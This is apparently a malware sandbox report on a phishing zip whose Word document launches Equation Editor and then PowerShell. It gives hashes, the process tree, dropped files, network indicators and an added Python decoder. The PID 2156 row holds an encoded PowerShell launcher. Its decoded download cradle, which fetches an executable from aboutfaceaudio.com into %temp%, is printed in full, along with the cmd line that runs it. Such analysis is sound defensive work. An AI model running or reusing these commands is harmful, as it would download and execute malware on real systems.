Field | Value |
---|---|
File name | PO #SAI-1007324.zip |
Full analysis | https://app.any.run/tasks/8392e1a1-7566-48b9-a6f5-531a08ee6e7b |
Verdict | Malicious activity |
Analysis date | April 23, 2019, 08:50:26 |
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags | |
Indicators | |
MIME | application/zip |
File info | Zip archive data, at least v2.0 to extract |
MD5 | 254E85392E64A880BE29AD4C3F70B450 |
SHA1 | E85891AE5F337F13E05E17DDB183144FB066338C |
SHA256 | 3E35D5001A28D73FCAC209F88E0D5132D1B1BB1045F18D3DDBF9606223B24335 |
SSDEEP | 24:9A6DXvNQI6tYNimULZGe4xdf7stJCiXkDu60GS:9pXvNwH4XPwipS |
Extension | Description |
---|---|
.zip | ZIP compressed archive (100) |

Field | Value |
---|---|
ZipRequiredVersion | 20 |
ZipBitFlag | - |
ZipCompression | Deflated |
ZipModifyDate | 2019:04:22 06:30:12 |
ZipCRC | 0x1796afed |
ZipCompressedSize | 910 |
ZipUncompressedSize | 1953 |
ZipFileName | PO #SAI-1007324.doc |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3872 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\PO #SAI-1007324.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin; Company: Alexander Roshal; Integrity Level: MEDIUM; Description: WinRAR archiver; Version: 5.60.0 | | | | |
3972 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Rar$DIa3872.45059\PO #SAI-1007324.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | WinRAR.exe |
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000 | | | | |
2672 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | | svchost.exe |
User: admin; Company: Design Science, Inc.; Integrity Level: MEDIUM; Description: Microsoft Equation Editor; Exit code: 0; Version: 00110900 | | | | |
2156 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w 1 -e aQBlAHgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABmAGkAbABlACgAIgBoAHQAdABwADoALwAvAGEAYgBvAHUAdABmAGEAYwBlAGEAdQBkAGkAbwAuAGMAbwBtAC8AZABvAHcAbgBsAGEAbwBkAHMALwBqAGEAbQAvAC4AcABhAHQAaAAvAGoAbwBlAGwALgBlAHgAZQAiACwAIgAkAGUAbgB2ADoAdABlAG0AcABcAHYAbgBjAGgAbwBzAHQALgBlAHgAZQAiACkAKQA7AA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | | EQNEDT32.EXE |
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 1; Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | | | |
3560 | cmd /c %temp%\vnchost.exe | C:\Windows\system32\cmd.exe | — | wmiprvse.exe |
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 1; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | | | | |
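The PowerShell row (PID 2156) carries its script as a `-e` argument, the short form of `-EncodedCommand`, which is base64 over the UTF-16LE bytes of the script text. The following is an added example for this report, not part of the sandbox output: it decodes that argument, pulls the download URL and drop path out of the result, and checks that the path the script writes to is the one the later `cmd /c %temp%\vnchost.exe` row (PID 3560) executes. The two command lines are copied verbatim from the process table above; the regexes, function names and the `normalize_env_path` helper are this example's own and only cover the spellings seen here.

```python
"""Decode a PowerShell -EncodedCommand argument and extract the IOCs it contains.

Added example for this report; not part of the sandbox output. The two command
lines below are copied from the process table (PIDs 2156 and 3560). The regular
expressions and helper names are this example's own assumptions.
"""
import base64
import re
from typing import Optional

# Copied from the PID 2156 row; the base64 blob is wrapped across lines only for width.
POWERSHELL_CMDLINE = (
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w 1 -e '
    "aQBlAHgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQA"
    "bwB3AG4AbABvAGEAZABmAGkAbABlACgAIgBoAHQAdABwADoALwAvAGEAYgBvAHUAdABmAGEAYwBlAGEAdQBkAGkA"
    "bwAuAGMAbwBtAC8AZABvAHcAbgBsAGEAbwBkAHMALwBqAGEAbQAvAC4AcABhAHQAaAAvAGoAbwBlAGwALgBlAHgA"
    "ZQAiACwAIgAkAGUAbgB2ADoAdABlAG0AcABcAHYAbgBjAGgAbwBzAHQALgBlAHgAZQAiACkAKQA7AA=="
)

# Copied from the PID 3560 row.
CMD_CMDLINE = r"cmd /c %temp%\vnchost.exe"


def find_encoded_arg(cmdline: str) -> Optional[str]:
    """Return the base64 argument following -e / -ec / -enc / -EncodedCommand, if any.

    PowerShell accepts any unambiguous prefix of -EncodedCommand; this pattern
    (an assumption of this example) covers the spellings commonly seen, not every
    legal prefix.
    """
    m = re.search(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline)
    return m.group(1) if m else None


def decode_encoded_command(blob: str) -> str:
    """-EncodedCommand is base64 over the UTF-16LE encoding of the script text."""
    return base64.b64decode(blob, validate=True).decode("utf-16-le")


def extract_iocs(script: str) -> dict:
    """Pick out URLs and environment-relative Windows paths from a command or script."""
    urls = re.findall(r"""https?://[^\s"'()]+""", script)
    # Matches both the PowerShell form ($env:temp\x.exe) and the cmd form (%temp%\x.exe).
    paths = re.findall(r"""(?:\$env:\w+|%\w+%)\\[^\s"'()]+""", script)
    return {"urls": urls, "paths": paths}


def normalize_env_path(path: str) -> str:
    """Map $env:NAME\... and %NAME%\... onto one spelling (%NAME%\..., lower-cased
    tail) so paths taken from PowerShell and cmd rows can be compared."""
    m = re.fullmatch(r"(?i)(?:\$env:(\w+)|%(\w+)%)(\\.*)", path)
    if not m:
        return path.lower()
    var = (m.group(1) or m.group(2)).upper()
    return f"%{var}%" + m.group(3).lower()


def drop_path_executed_later(ps_cmdline: str, later_cmdline: str) -> bool:
    """True when a path the decoded PowerShell script writes to is also a path that
    a later command line (here the cmd.exe row) executes."""
    blob = find_encoded_arg(ps_cmdline)
    if blob is None:
        return False
    written = {normalize_env_path(p) for p in extract_iocs(decode_encoded_command(blob))["paths"]}
    executed = {normalize_env_path(p) for p in extract_iocs(later_cmdline)["paths"]}
    return bool(written & executed)


if __name__ == "__main__":
    script = decode_encoded_command(find_encoded_arg(POWERSHELL_CMDLINE))
    print(script)
    print(extract_iocs(script))
    print("drop path executed later:", drop_path_executed_later(POWERSHELL_CMDLINE, CMD_CMDLINE))
```

The decoded script is `iex ((new-object net.webclient).downloadfile("http://aboutfaceaudio.com/downlaods/jam/.path/joel.exe","$env:temp\vnchost.exe"));`. The `downlaods` spelling is in the sample's URL, not a transcription error. `DownloadFile` returns nothing for `iex` to run; execution of the dropped file is the separate `cmd /c %temp%\vnchost.exe` row, whose parent is wmiprvse.exe, and both that row and the PowerShell row ended with exit code 1 in this run.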
PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
3972 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR4C58.tmp.cvr | — | — | — |
2156 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ONQ5A0WB6FYK8C6KN5DO.temp | — | — | — |
2672 | EQNEDT32.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@pastebin[1].txt | text | 4BCA02BAF1B5D3BD9014B6D4D25DD686 | BDD5F8BF96A2A97ACADF2106DD9B252EAE7C7C8FD00A2574F093DAD65652FF5F |
2672 | EQNEDT32.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\TqTpj30L[1].txt | html | DC8F82806FB8CD533ECACAEB89390D39 | 58C753D3D1CE410705C79DF26E3981E9F94DE1F17423BBF2EE8A87B698352CCB |
2156 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 33B4C42BAF9E3CA295E3BDCD51C02EAF | B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5 |
2156 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF11abbe.TMP | binary | 33B4C42BAF9E3CA295E3BDCD51C02EAF | B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5 |
3972 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | 2DCF80A5356F4143CE5983EA13DAF046 | 970287722974AE525DF33EA92EF7C144A81C12BFA98E5C46F1614A141D0BC0FF |
3972 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Rar$DIa3872.45059\~$ #SAI-1007324.doc | pgc | F170A81F9AB1474218F0B9EEE315A65D | 9A7995B195CD9C11225D2F645F3FDD855A9A6DFEBCA0829E7FFB076E5EEE8B6F |
3872 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DIa3872.45059\PO #SAI-1007324.doc | text | E3644A04429F86CFE06BCCAADD5EE335 | 7FD1E2DF4029664205FD4F2195630ACE6C871C68A78EA0314B8052F72C1B21AA |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2672 | EQNEDT32.EXE | 104.20.208.21:443 | pastebin.com | Cloudflare Inc | US | shared |
2156 | powershell.exe | 64.111.126.227:80 | aboutfaceaudio.com | New Dream Network, LLC | US | suspicious |
2672 | EQNEDT32.EXE | 104.20.209.21:443 | pastebin.com | Cloudflare Inc | US | shared |
Domain | IP | Reputation |
---|---|---|
pastebin.com | | shared |
aboutfaceaudio.com | | unknown |
dns.msftncsi.com | | shared |